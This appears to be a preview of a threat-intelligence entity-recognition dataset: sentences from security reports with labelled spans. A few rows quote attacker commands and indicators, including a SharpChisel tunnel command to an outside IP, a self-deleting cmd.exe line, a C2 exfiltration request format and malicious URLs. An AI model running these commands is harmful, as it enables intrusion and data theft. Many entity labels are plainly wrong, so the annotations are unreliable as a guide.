id
int64 1
14.4k
| text
stringlengths 3
5.01k
| entities
list | relations
list | Comments
list |
---|---|---|---|---|
12,043 | Our recommendations: Additional resources: Avoid & Report Phishing Emails. | [
{
"id": 37265,
"label": "attack-pattern",
"start_offset": 58,
"end_offset": 66
}
] | [] | [] |
8,843 | Reversing the file revealed that it was the PlugX loader, a remote access tool (RAT) that has been historically used in attacks targeting government-related industries and organizations. | [
{
"id": 27380,
"label": "malware",
"start_offset": 44,
"end_offset": 49
},
{
"id": 27381,
"label": "location",
"start_offset": 60,
"end_offset": 66
},
{
"id": 27382,
"label": "location",
"start_offset": 74,
"end_offset": 78
},
{
"id": 27383,
"label": "location",
"start_offset": 168,
"end_offset": 171
}
] | [] | [] |
83 | Many users realize their system is infected with coin mining malware when their laptop fans kick into high-speed mode to keep the overtaxed CPU cool. | [] | [] | [] |
4,424 | GeckoHtmlElement > ( | [] | [] | [] |
5,983 | This campaign, targeting high risk individuals in Ukraine, contained links leading to compromised websites where the first stage phishing page was hosted. | [
{
"id": 18414,
"label": "location",
"start_offset": 5,
"end_offset": 13
},
{
"id": 18417,
"label": "attack-pattern",
"start_offset": 129,
"end_offset": 137
},
{
"id": 18418,
"label": "location",
"start_offset": 138,
"end_offset": 142
}
] | [] | [] |
7,794 | Instead of attachments, it had malicious URLs in the message content that lead to the download of a malicious document named fedex.doc from hxxp://www.fedexdocs[.]top/fedex.doc or hxxp://www.fedexdocs[.]icu/fedex.doc. | [
{
"id": 24142,
"label": "location",
"start_offset": 61,
"end_offset": 68
},
{
"id": 24143,
"label": "threat-actor",
"start_offset": 74,
"end_offset": 78
}
] | [] | [] |
7,364 | /up.txt 172.16 | [] | [] | [] |
605 | They’ve done this by moving the Hancitor malware from being a malicious attachment in spam to itself being a malicious download. | [
{
"id": 46201,
"label": "malware",
"start_offset": 33,
"end_offset": 41
}
] | [] | [] |
3,864 | Popup message when the user opens the document that abuses Link Auto Update Koadic sends its own JavaScript code as plain text. | [
{
"id": 49725,
"label": "malware",
"start_offset": 76,
"end_offset": 82
}
] | [] | [] |
10,652 | As organizations reeled from the Log4Shell vulnerability (CVE-2021-44228), cyberattacks aiming at open-source web servers, like Apache HTTP Server, were rapidly rising. | [
{
"id": 32519,
"label": "attack-pattern",
"start_offset": 103,
"end_offset": 109
}
] | [] | [] |
11,025 | Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. | [
{
"id": 33618,
"label": "attack-pattern",
"start_offset": 42,
"end_offset": 48
}
] | [] | [] |
3,922 | When simplified, the malicious script looks like this, with the eval being the executor and the Request.Form acquiring the parameter to be executed: | [] | [] | [] |
5,946 | Related IOCs | [] | [] | [] |
2,419 | When web users access trade object properties, the binding process (bindRequestParameters) in the Spring framework implementation will call the getCachedIntrospectionResults method to get and set the object property in the cache. | [
{
"id": 47494,
"label": "SOFTWARE",
"start_offset": 99,
"end_offset": 115
}
] | [] | [] |
7,257 | If you have communicated with any of these accounts or visited the actors’ blog, we suggest you review your systems for the IOCs provided below. | [] | [] | [] |
7,254 | We encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP submission process. | [] | [] | [] |
4,307 | Tags APT & Targeted Attacks | Endpoints | Research | Network | [] | [] | [] |
630 | AutoFocus users view samples using the Petya tag. | [
{
"id": 2102,
"label": "malware",
"start_offset": 39,
"end_offset": 44
}
] | [] | [] |
2,312 | While the javascript starting the exploit chain checks whether visitors were running macOS Mojave (10.14) or Catalina (10.15) before proceeding to run the exploits, we only observed remnants of an exploit when visiting the site with Mojave but received the full non-encrypted exploit chain when browsing the site with Catalina. | [
{
"id": 47376,
"label": "SOFTWARE",
"start_offset": 85,
"end_offset": 105
},
{
"id": 47377,
"label": "SOFTWARE",
"start_offset": 109,
"end_offset": 125
},
{
"id": 47378,
"label": "SOFTWARE",
"start_offset": 233,
"end_offset": 239
},
{
"id": 47379,
"label": "SOFTWARE",
"start_offset": 318,
"end_offset": 326
}
] | [] | [] |
2,871 | Attackers can manipulate memory allocations by using JavaScript to allocate an object that is freed before all references to that object are removed. | [] | [] | [] |
13,584 | The first method is uploading a PHP web shell file by calling the native API provided by the framework. | [
{
"id": 42347,
"label": "attack-pattern",
"start_offset": 36,
"end_offset": 45
}
] | [] | [] |
5,997 | While we are actively monitoring activity related to Ukraine and Russia, we continue to be just as vigilant in relation to other threat actors globally, to ensure that they do not take advantage of everyone’s focus on this region. | [
{
"id": 18476,
"label": "location",
"start_offset": 9,
"end_offset": 12
},
{
"id": 18478,
"label": "location",
"start_offset": 61,
"end_offset": 64
},
{
"id": 18480,
"label": "identity",
"start_offset": 91,
"end_offset": 95
},
{
"id": 18481,
"label": "location",
"start_offset": 223,
"end_offset": 229
}
] | [] | [] |
9,593 | POST http://{C2}/?Key={GUID}&Crc={Identifier} { "appName": "Gmail Downloader", "targetname": "{Email}", "HostName": "REDACTED", "srcUserIP": "REDACTED", "actionType": "First", "timeOccurrence": "05/01/2022 05:50:31 PM", "OS": "REDACTED", "OSVersion": "REDACTED", "SystemModel": "REDACTED", "SystemType": "REDACTED", "srcName": "REDACTED", "srcOrgName": "REDACTED" } | [
{
"id": 29396,
"label": "location",
"start_offset": 0,
"end_offset": 4
},
{
"id": 29397,
"label": "URL",
"start_offset": 5,
"end_offset": 44
},
{
"id": 29399,
"label": "TIME",
"start_offset": 206,
"end_offset": 217
}
] | [] | [] |
14,204 | GitHub is no stranger to misuse, however. | [] | [] | [] |
3,449 | Table 1. Commands observed in CVE-2022-1388 exploitation attempts. | [
{
"id": 49222,
"label": "vulnerability",
"start_offset": 31,
"end_offset": 44
}
] | [] | [] |
12,638 | Figure 6. | [] | [] | [] |
12,212 | We received leads from Graphika that supported us in this investigation. | [] | [] | [] |
10,262 | Figures 2-3. | [] | [] | [] |
3,017 | And many of these devices feature mute buttons that can functionally turn them off when you don’t need them. | [] | [] | [] |
1,495 | Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! | [] | [] | [] |
4,165 | Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region. | [
{
"id": 49970,
"label": "threat-actor",
"start_offset": 53,
"end_offset": 66
},
{
"id": 49971,
"label": "location",
"start_offset": 79,
"end_offset": 102
}
] | [
{
"id": 894,
"from_id": 49970,
"to_id": 49971,
"type": "located-at"
}
] | [] |
11,968 | We terminated 9 YouTube channels as part of our investigation into coordinated influence operations linked to China. | [] | [] | [] |
12,067 | When they did, attackers sent them phishing links in follow-on correspondence. | [
{
"id": 37348,
"label": "location",
"start_offset": 30,
"end_offset": 34
},
{
"id": 37349,
"label": "attack-pattern",
"start_offset": 35,
"end_offset": 43
}
] | [] | [] |
3,123 | Here we explain this type of attack and what you should do. | [] | [] | [] |
841 | Because of this, attacks against the kernel are used to gain complete control over a system, generally as part of an “elevation or privilege” (EoP) or “privilege escalation” attack. | [
{
"id": 2756,
"label": "attack-pattern",
"start_offset": 152,
"end_offset": 172
},
{
"id": 46393,
"label": "attack-pattern",
"start_offset": 118,
"end_offset": 140
}
] | [] | [] |
5,695 | Figure 1. | [] | [] | [] |
4,507 | On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam. | [
{
"id": 50307,
"label": "identity",
"start_offset": 3,
"end_offset": 8
},
{
"id": 50308,
"label": "identity",
"start_offset": 31,
"end_offset": 36
},
{
"id": 50309,
"label": "attack-pattern",
"start_offset": 69,
"end_offset": 77
},
{
"id": 50311,
"label": "attack-pattern",
"start_offset": 93,
"end_offset": 97
},
{
"id": 50310,
"label": "attack-pattern",
"start_offset": 79,
"end_offset": 87
}
] | [] | [] |
4,530 | APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing. | [
{
"id": 50326,
"label": "attack-pattern",
"start_offset": 116,
"end_offset": 147
}
] | [] | [] |
2,381 | After its payload is decrypted, StealthMutant performs process hollowing to execute its payload in a remote process. | [
{
"id": 7081,
"label": "attack-pattern",
"start_offset": 55,
"end_offset": 72
},
{
"id": 47444,
"label": "malware",
"start_offset": 32,
"end_offset": 45
}
] | [
{
"id": 325,
"from_id": 47444,
"to_id": 7081,
"type": "uses"
}
] | [] |
5,746 | The Cambridge Analytica scandal continues to haunt Facebook. | [] | [] | [] |
9,665 | Figure 9. | [] | [] | [] |
2,904 | s[_local28][(((_local41 - _local12) / 4) + 17)] | [] | [] | [] |
10,503 | Today, we’re sharing recent findings on government-backed phishing, threats and disinformation, as well as a new bulletin to share information about actions we take against accounts that we attribute to coordinated influence campaigns. | [
{
"id": 31940,
"label": "attack-pattern",
"start_offset": 58,
"end_offset": 66
},
{
"id": 31941,
"label": "location",
"start_offset": 76,
"end_offset": 79
}
] | [] | [] |
5,094 | If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript. | [
{
"id": 51196,
"label": "SOFTWARE",
"start_offset": 72,
"end_offset": 78
},
{
"id": 51197,
"label": "attack-pattern",
"start_offset": 79,
"end_offset": 82
}
] | [] | [] |
757 | In IE9, for example, it has been applied to every object through MemoryProtection::HeapFree as shown in figure 2. | [
{
"id": 46345,
"label": "SOFTWARE",
"start_offset": 3,
"end_offset": 6
}
] | [] | [] |
5,511 | The $228m penalty levied by the UK’s privacy watchdog reflects the seriousness of the attack and the carrier’s failure to protect its customer’s personal and financial information. | [
{
"id": 51522,
"label": "identity",
"start_offset": 32,
"end_offset": 53
}
] | [] | [] |
1,334 | This registry key ensures that the malware will persist across reboots when the current user logs in. | [] | [] | [] |
8,049 | The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. | [
{
"id": 24974,
"label": "location",
"start_offset": 83,
"end_offset": 86
},
{
"id": 24975,
"label": "location",
"start_offset": 126,
"end_offset": 129
},
{
"id": 24976,
"label": "attack-pattern",
"start_offset": 159,
"end_offset": 167
},
{
"id": 24977,
"label": "location",
"start_offset": 168,
"end_offset": 173
},
{
"id": 24978,
"label": "location",
"start_offset": 177,
"end_offset": 181
},
{
"id": 24979,
"label": "location",
"start_offset": 182,
"end_offset": 186
}
] | [] | [] |
5,005 | TAG continues to track more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors. | [
{
"id": 51061,
"label": "identity",
"start_offset": 0,
"end_offset": 3
}
] | [] | [] |
2,887 | If we go back and examine the exploit code for CVE-2013-3163, we see that the string ‘org’ was originally used as the trigger, and the variable ‘found’ was originally used as a flag indicating if the Vector object was modified. | [
{
"id": 48083,
"label": "vulnerability",
"start_offset": 47,
"end_offset": 60
}
] | [] | [] |
13,970 | Today’s Challenge | [] | [] | [] |
2,824 | Figure 1 Ransom note for WanaCrypt0r | [
{
"id": 8627,
"label": "tools",
"start_offset": 25,
"end_offset": 36
}
] | [] | [] |
4,083 | We think that this Lilith RAT is a highly modified version of the open-source Lilith RAT. | [
{
"id": 49919,
"label": "malware",
"start_offset": 78,
"end_offset": 88
},
{
"id": 49918,
"label": "malware",
"start_offset": 19,
"end_offset": 29
}
] | [] | [] |
9,445 | Stage 2: Dropper | [] | [] | [] |
1,792 | The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class/code. | [
{
"id": 46924,
"label": "FILEPATH",
"start_offset": 75,
"end_offset": 83
},
{
"id": 46923,
"label": "FILEPATH",
"start_offset": 99,
"end_offset": 110
}
] | [] | [] |
1,385 | The in-memory payload (Tbopbh.jpg) is running within the context of the InstallUtil.exe process 9. Multiple instances of cmd.exe calling Ping.exe to delete file InstallUtil.exe, e.g. cmd.exe /min /C ping 111.111.111[.]111 -n 5 -w 10 > Nul & Del /f /q %TEMP%\InstallUtil.exe 10. File AdvancedRun.exe is deleted from the C:\Users\[USERNAME]\AppData\Local\Temp directory by the stage2.exe binary. 11. ICMP traffic to host: 111.111.111[.]111 12. | [
{
"id": 4149,
"label": "malware",
"start_offset": 122,
"end_offset": 129
},
{
"id": 4150,
"label": "malware",
"start_offset": 184,
"end_offset": 191
},
{
"id": 4151,
"label": "tools",
"start_offset": 200,
"end_offset": 204
},
{
"id": 4152,
"label": "IPV4",
"start_offset": 205,
"end_offset": 222
},
{
"id": 4154,
"label": "IPV4",
"start_offset": 423,
"end_offset": 440
},
{
"id": 46732,
"label": "FILEPATH",
"start_offset": 285,
"end_offset": 300
},
{
"id": 46730,
"label": "FILEPATH",
"start_offset": 23,
"end_offset": 33
},
{
"id": 46731,
"label": "FILEPATH",
"start_offset": 252,
"end_offset": 274
},
{
"id": 46733,
"label": "FILEPATH",
"start_offset": 321,
"end_offset": 387
}
] | [] | [] |
5,090 | The attackers made use of an exploit kit that contained multiple stages and components in order to exploit targeted users. | [] | [] | [] |
10,720 | Like many cyberespionage campaigns, REDBALDKNIGHT’s attacks are intermittent but drawn-out. | [
{
"id": 32751,
"label": "location",
"start_offset": 5,
"end_offset": 9
},
{
"id": 32752,
"label": "threat-actor",
"start_offset": 36,
"end_offset": 49
},
{
"id": 32753,
"label": "location",
"start_offset": 60,
"end_offset": 63
}
] | [] | [] |
8,102 | Figure 3. | [] | [] | [] |
8,496 | This blog has been revised to include new facts that have been released since the original posting. | [] | [] | [] |
5,261 | Versions of AnubisSpy posed as social news, promotional, healthcare, and entertainment apps. | [
{
"id": 51302,
"label": "malware",
"start_offset": 12,
"end_offset": 21
}
] | [] | [] |
4,947 | Link shorteners and click trackers are heavily used for this purpose, and are oftentimes embedded within PDF files. | [] | [] | [] |
6,975 | We have been observing CapraRAT samples since 2017, and one of the first samples we analyzed (SHA-256: d9979a41027fe790399edebe5ef8765f61e1eb1a4ee1d11690b4c2a0aa38ae42, detected by Trend Micro as as AndroidOS_Androrat.HRXD) | [
{
"id": 21848,
"label": "malware",
"start_offset": 23,
"end_offset": 31
},
{
"id": 21850,
"label": "location",
"start_offset": 53,
"end_offset": 56
},
{
"id": 21853,
"label": "SHA2",
"start_offset": 104,
"end_offset": 168
}
] | [] | [] |
10,081 | What is Sunburst? | [] | [] | [] |
8,775 | We terminated 1 blog as part of our investigation into coordinated influence operations linked to Argentina. | [] | [] | [] |
8,367 | C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries | [
{
"id": 25746,
"label": "IPV4",
"start_offset": 4,
"end_offset": 18
},
{
"id": 25747,
"label": "IPV4",
"start_offset": 19,
"end_offset": 32
}
] | [] | [] |
6,475 | Another instance of SharpChisel with different settings is executed, this time using PowerShell using the following command line: powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999 | [
{
"id": 20121,
"label": "location",
"start_offset": 74,
"end_offset": 78
},
{
"id": 20122,
"label": "attack-pattern",
"start_offset": 85,
"end_offset": 95
}
] | [] | [] |
14,391 | The delivery and reconnaissance could involve multiple protocols, emails, payloads, files, and credentials. | [] | [] | [] |
14,086 | While analyzing one malware previously attributed to APT37, it executed practically the same command sequences including the paths and extensions. | [
{
"id": 48167,
"label": "threat-actor",
"start_offset": 53,
"end_offset": 58
}
] | [] | [] |
7,366 | The kit we found is in tgz format, though we have observed some samples disguised as png or jpg. | [] | [] | [] |
9,649 | Subsequently, it implements the Loader::installLoader method, reading the hardcoded 64-bit Mach-O executable (magic value 0xFEEDFACF), and writing to the previously determined path and file. | [
{
"id": 29523,
"label": "location",
"start_offset": 63,
"end_offset": 70
},
{
"id": 29524,
"label": "identity",
"start_offset": 88,
"end_offset": 91
},
{
"id": 29525,
"label": "location",
"start_offset": 92,
"end_offset": 96
},
{
"id": 29526,
"label": "location",
"start_offset": 136,
"end_offset": 139
},
{
"id": 29527,
"label": "location",
"start_offset": 182,
"end_offset": 185
}
] | [] | [] |
5,886 | Just like on the physical or kinetic side, we need to be very cognizant of our critical infrastructure. | [
{
"id": 18091,
"label": "identity",
"start_offset": 0,
"end_offset": 4
}
] | [] | [] |
6,635 | They have also been observed using Google Drive for their C2 channel. | [] | [] | [] |
227 | The webpage is imitating a popular cloud file storage site. | [] | [] | [] |
13,149 | We found that Tropic Trooper’s latest activities center on targeting Taiwanese and the Philippine military’s physically isolated networks through a USBferry attack (the name derived from a sample found in a related research). | [
{
"id": 48927,
"label": "threat-actor",
"start_offset": 14,
"end_offset": 28
},
{
"id": 48928,
"label": "location",
"start_offset": 69,
"end_offset": 79
},
{
"id": 48929,
"label": "location",
"start_offset": 87,
"end_offset": 98
},
{
"id": 48931,
"label": "identity",
"start_offset": 98,
"end_offset": 109
},
{
"id": 48930,
"label": "malware",
"start_offset": 148,
"end_offset": 163
}
] | [
{
"id": 500,
"from_id": 48931,
"to_id": 48929,
"type": "located-at"
},
{
"id": 501,
"from_id": 48931,
"to_id": 48928,
"type": "located-at"
},
{
"id": 503,
"from_id": 48927,
"to_id": 48930,
"type": "uses"
},
{
"id": 502,
"from_id": 48927,
"to_id": 48931,
"type": "targets"
}
] | [] |
3,909 | Threats such as this can be difficult to detect even with multiple security layers — especially if they are not consolidated. In this blog, we will dissect a targeted attack that made use of the Chopper ASPX web shell (detected by Trend Micro as Backdoor.ASP.WEBSHELL.UWMANA). Technical Analysis | [
{
"id": 49758,
"label": "malware",
"start_offset": 197,
"end_offset": 219
},
{
"id": 49759,
"label": "malware",
"start_offset": 248,
"end_offset": 276
},
{
"id": 49760,
"label": "identity",
"start_offset": 233,
"end_offset": 244
}
] | [] | [] |
13,167 | Figure 2. USBferry malware’s first version, where the EXE file is the USBferry malware and the DLL file is trojan TROJ_YAHOYAH | [
{
"id": 41093,
"label": "tools",
"start_offset": 12,
"end_offset": 20
},
{
"id": 41095,
"label": "malware",
"start_offset": 72,
"end_offset": 80
},
{
"id": 41096,
"label": "location",
"start_offset": 89,
"end_offset": 92
}
] | [] | [] |
14,326 | Figure 16. | [] | [] | [] |
3,414 | Win64.BIOPASS.A | [
{
"id": 49104,
"label": "malware",
"start_offset": 0,
"end_offset": 15
}
] | [] | [] |
7,384 | Figure 5. | [] | [] | [] |
7,637 | But this attack sent an email with a .rar or .zip attachment. | [] | [] | [] |
10,024 | — HKTL_BROWSERPASSVIEW.GA URLs related to the malicious update file: | [] | [] | [] |
5,425 | In the age of work-from-home (WFH) during the pandemic, it’s possible that espionage is part of the reason that IoT devices are still major targets for advanced attackers. | [] | [] | [] |
4,616 | You can see the path and name of the web shell. | [
{
"id": 50523,
"label": "attack-pattern",
"start_offset": 37,
"end_offset": 46
}
] | [] | [] |
11,799 | When they did, attackers sent them phishing links in follow-on correspondence. | [
{
"id": 36389,
"label": "location",
"start_offset": 30,
"end_offset": 34
},
{
"id": 36390,
"label": "attack-pattern",
"start_offset": 35,
"end_offset": 43
}
] | [] | [] |
3,172 | It also has the ability to compromise the private information of its victims by stealing web browser and instant messaging client data. | [] | [] | [] |
12,481 | We terminated 3 YouTube channels as part of our investigation into coordinated influence operations linked to France. | [] | [] | [] |
7,083 | In the version that we’ve analyzed, the installer writes the token in the registry key. | [] | [] | [] |
6,219 | Figure 13. | [] | [] | [] |
7,444 | Apart from targeting Gmail users, Pawn Storm has also abused OAuth in credential phishing attacks against high profile Yahoo users. | [
{
"id": 23146,
"label": "attack-pattern",
"start_offset": 81,
"end_offset": 89
}
] | [] | [] |
7,169 | Last month we tracked new scouting techniques coming from Andariel, which were used mainly against South Korean targets. | [] | [] | [] |
6,985 | Access the unique identification number Access location information | [] | [] | [] |
926 | In truth, this version has made a number of improvements, such as adding more file types to target, ignoring certain directories, and using a better encryption routine. | [] | [] | [] |
3,084 | In the past 48 hours, there has been a flurry of activity as hardware and software vendors move to address two sets of vulnerabilities that have been dubbed “Meltdown” and “Spectre”. | [
{
"id": 45764,
"label": "vulnerability",
"start_offset": 158,
"end_offset": 166
},
{
"id": 45765,
"label": "vulnerability",
"start_offset": 173,
"end_offset": 180
},
{
"id": 9420,
"label": "TIME",
"start_offset": 3,
"end_offset": 20
}
] | [] | [] |
10,828 | When this message is received, a periodic task for sync message is set. | [] | [] | [] |
291 | gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa7efkz5bd5464id[.]onion | [
{
"id": 44687,
"label": "DOMAIN",
"start_offset": 1,
"end_offset": 65
}
] | [] | [] |
6,958 | Malicious macro codes will download, decode, and execute the ObliqueRat malware Figure 12 shows a summary of the ObliqueRat malware’s infection chain: Figure 12. | [
{
"id": 21782,
"label": "location",
"start_offset": 22,
"end_offset": 26
},
{
"id": 21783,
"label": "location",
"start_offset": 45,
"end_offset": 48
},
{
"id": 21784,
"label": "malware",
"start_offset": 61,
"end_offset": 71
},
{
"id": 21786,
"label": "tools",
"start_offset": 117,
"end_offset": 127
}
] | [] | [] |
2,385 | However, we have yet to retrieve and study one of these plug-ins. | [] | [] | [] |
14,046 | Figure 5. | [] | [] | [] |
11,679 | Digging deeper, we found that it hosted several phishing pages. | [
{
"id": 35818,
"label": "attack-pattern",
"start_offset": 48,
"end_offset": 56
}
] | [] | [] |